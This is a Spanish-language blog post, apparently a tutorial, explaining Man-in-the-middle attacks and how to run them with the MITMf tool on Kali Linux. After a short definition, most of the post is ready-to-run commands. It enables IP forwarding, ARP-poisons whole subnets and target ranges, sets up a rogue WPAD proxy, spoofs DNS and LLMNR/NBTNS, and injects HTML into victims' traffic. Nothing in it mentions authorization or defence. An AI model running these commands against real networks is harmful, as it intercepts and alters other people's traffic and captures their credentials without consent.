Advertisement

header ads

HACER ATAQUES Man-in-the-middle con (MITMF) EN KALI LINUX

El otro día estaba dando mi pequeño WORKSHOP en EKOSPACE y una persona comento sobre los ataques Man-in-the-middle, aunque es uno de los ataques mas silencioso, pueden llegar a capturarte en la red.




También quisiera agradecer a esa persona que hizo que comenzará a investigar más sobre el tema.
Pero antes de empezar vamos a ver algo de significado:

¿Qué es Man-in-the-middle?

Man-in-the-middle es un ataque en el que se adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. El ataque MitM es particularmente significativo en el protocolo original de intercambio de claves de Diffie-Hellman, cuando éste se emplea sin autenticación. Hay ciertas situaciones donde es bastante simple, por ejemplo, un atacante dentro del alcance de un punto de acceso wifi sin cifrar, donde éste se puede insertar como intermediario.

Qué es mitmf ?

MITMf tiene como objetivo proporcionar una ventanilla única para Man-In-The-Middle y ataques de red mientras se actualizan y mejoran los ataques y técnicas existentes.
Originalmente construido para abordar las deficiencias significativas de otras herramientas (por ejemplo, Ettercap, Mallory), ha sido casi completamente re-escrito desde cero para proporcionar un marco modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.
Es una herramienta que actualmente viene en KALI LINUX en sus paquetes

INSTALACIÓN

apt-get install mitmf
sysctl -w net.ipv4.ip_forward=1
nano /etc/sysctl.conf
Des comentamos la parte de
# Uncomment the next line to enable packet forwarding for IPv4
net.ipv4.ip_forward=1
Listo lo guardas con CONTROL + X
Y podes jugar con su herramienta
El uso más básico, inicia el proxy HTTP SMB, DNS, servidores HTTP y Net-Creds en la interfaz wlan0:
mitmf -i wlan0
ARP envenenan toda la subred con la pasarela en 192.168.1.1 utilizando el complemento Spoof:
mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1
Igual que el anterior + un servidor proxy desleal WPAD usando el complemento Responder:
mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
ARP veneno 192.168.1.16-45 y 192.168.0.1/24 con la puerta de enlace en 192.168.1.1:
 mitmf -i wlan0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
Habilitar la suplantación de DNS mientras envenena ARP (Los dominios a spoof se extraen del archivo de configuración):
mitmf -i wlan0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
Habilitar la suplantación de LLMNR/NBTNS/MDNS:
mitmf -i wlan0 --responder --wredir --nbtns
Inyectar un HTML usando el complemento Inject:
mitmf -i wlan0 --inject --html-url https://creadpag.com
Bueno tiene mas comandos de su creador. AQUÍ

Publicar un comentario

0 Comentarios